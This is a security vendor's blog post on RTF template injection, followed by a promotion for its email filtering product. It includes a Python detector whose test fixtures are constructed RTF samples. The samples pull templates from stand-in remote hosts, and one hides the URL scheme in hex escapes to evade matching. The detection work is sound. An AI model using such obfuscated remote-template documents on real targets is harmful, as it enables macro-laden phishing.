
New Ransomware Technique: RTF Template Injection

Posted by Trevagh Stankard on Tue, Dec 28th, 2021

Will there never be an end to ransomware innovation? One of the reasons ransomware continues to be such a formidable adversary is the ability of ransomware creators to keep releasing new strains and new attack methodologies. Back in March of 2021, a new technique called RTF Template Injection was discovered. Since then, it has been adopted by several nation-state actors, and its use is expected to become more widespread in the coming months.

How the Attack Works

The attack takes advantage of a feature within Microsoft Word that allows you to create a document from a template. When creating a document using a rich text format (RTF) file, you can include a reference to an RTF template that specifies how the document should be formatted. These template files can be stored locally on the user's machine or retrieved from a URL or remote machine. Threat actors have learned to take advantage of this by hosting template files with malicious macros on their own servers. Each time the document is opened or written to, it fetches the template automatically, allowing the infected template files to traverse the network in the open. These templates have a better chance of moving undetected by security filters and controls because the carrier is a recognized RTF file. Many phishing campaigns have been identified using these files.

The reason RTF files are used in this case is that RTF files store their document formatting properties as plaintext strings within the bytes of the file. This allows threat actors to read the formatting properties of an RTF document and modify the location of the supporting template file so that the template is retrieved from a URL of their choosing.
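Because the template reference is plain text inside the file, a mail gateway or sandbox can check it without opening the document in Word. The script below is an added example for this post, not code from TitanHQ or from any of the research cited; it scans RTF bytes for the `\*\template` destination (the RTF control word that names the document template), decodes the common RTF escapes an attacker might use to hide the target (`\'hh` hex bytes, `\uN` Unicode escapes, escaped backslashes), and flags any template that points at a URL or UNC path rather than a local file. The sample documents are constructed for the example and are not real malware.

```python
import re
from typing import Optional

# Constructed sample RTF documents (not real samples). In RTF a literal
# backslash is written as "\\", so C:\Users appears as C:\\Users in the bytes.
BENIGN_RTF = rb"{\rtf1\ansi{\*\template C:\\Users\\alice\\Templates\\report.dotm}\pard Quarterly report\par}"
REMOTE_RTF = rb"{\rtf1\ansi{\*\template http://example.invalid/t.dotm}\pard Invoice attached\par}"
# Same remote target, with "http" spelled as hex-escaped bytes to evade naive string matching.
HEX_RTF = rb"{\rtf1\ansi{\*\template \'68\'74\'74\'70://example.invalid/hex.dotm}\pard Hi\par}"
# UNC path: the template is fetched over SMB from another host.
UNC_RTF = rb"{\rtf1\ansi{\*\template \\\\fileserver.example.invalid\\share\\t.dotm}\par}"

TEMPLATE_DEST = re.compile(rb"\{\\\*\\template\b")
CONTROL_WORD = re.compile(rb"\\([A-Za-z]+)(-?\d+)? ?")

# A template location starting with one of these is fetched off-host.
REMOTE_PREFIXES = ("http://", "https://", "ftp://", "\\\\")


def decode_rtf_text(raw: bytes) -> str:
    """Turn the raw contents of an RTF destination group into plain text."""
    pieces = []
    i = 0
    while i < len(raw):
        c = raw[i:i + 1]
        if c != b"\\":
            pieces.append(c.decode("cp1252", errors="replace"))
            i += 1
            continue
        nxt = raw[i + 1:i + 2]
        if nxt == b"'":                      # \'hh: one hex-encoded byte
            pieces.append(bytes([int(raw[i + 2:i + 4], 16)]).decode("cp1252", errors="replace"))
            i += 4
        elif nxt in (b"\\", b"{", b"}"):     # escaped literal character
            pieces.append(nxt.decode())
            i += 2
        else:                                # a control word such as \uN? or \ansi
            m = CONTROL_WORD.match(raw, i)
            if m and m.group(1) == b"u" and m.group(2):
                # \uN is a Unicode code point followed by one fallback char to skip.
                pieces.append(chr(int(m.group(2)) % 65536))
                i = m.end() + 1
            else:
                i = m.end() if m else i + 2  # drop other control words entirely
    return "".join(pieces).strip()


def extract_template_target(rtf: bytes) -> Optional[str]:
    """Return the decoded template location, or None if the file names no template."""
    m = TEMPLATE_DEST.search(rtf)
    if not m:
        return None
    # Walk to the brace that closes this group, honouring nested groups and
    # escaped braces/backslashes so an attacker cannot cut the scan short.
    depth, i = 1, m.end()
    start = i
    while i < len(rtf) and depth:
        c = rtf[i:i + 1]
        if c == b"\\":
            i += 2
            continue
        if c == b"{":
            depth += 1
        elif c == b"}":
            depth -= 1
        i += 1
    return decode_rtf_text(rtf[start:i - 1])


def classify(rtf: bytes) -> str:
    """Label an RTF file by where its template would be loaded from."""
    target = extract_template_target(rtf)
    if target is None:
        return "no-template"
    if target.lower().startswith(REMOTE_PREFIXES):
        return f"remote-template:{target}"
    return f"local-template:{target}"


if __name__ == "__main__":
    for name, doc in [("benign", BENIGN_RTF), ("remote", REMOTE_RTF),
                      ("hex", HEX_RTF), ("unc", UNC_RTF)]:
        print(f"{name:7s} -> {classify(doc)}")
```

A gateway rule built on this would quarantine or detonate anything labelled `remote-template`, since a legitimately authored document rarely needs to pull its template from an arbitrary Internet host; the hex and UNC samples show why matching on the literal string `http` in the file is not enough.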

How to Combat these Attacks

These RTF injection attacks are normally delivered through phishing attacks. For that reason, it is essential to have a modern, advanced email security solution that prevents these files from reaching user inboxes in the first place. SpamTitan by TitanHQ is ideally suited to thwart these types of attacks. Besides its integrated double antivirus protection, SpamTitan has a built-in next-generation sandbox to protect against attacks that use file types normally considered benign. A sandbox works by isolating a suspicious file and executing or detonating the file or URL before it reaches your network. If the initiated action results in a malicious outcome, the file is deleted. Should the file pass the test, it is reattached to the email and forwarded to the recipient. In addition, SpamTitan uses auto-learning and heuristics to identify anomalies in the structure and behavior of a file.

Fight Innovation with Innovation

Cybercriminals are relentless in their pursuit of new ways to exploit systems and users. That's why you need a security vendor that is relentless in creating new, innovative solutions to combat their efforts. At TitanHQ, we are constantly enhancing SpamTitan and WebTitan to ensure that our customers are protected. We encourage you to find out more about our innovative solutions by contacting us today.
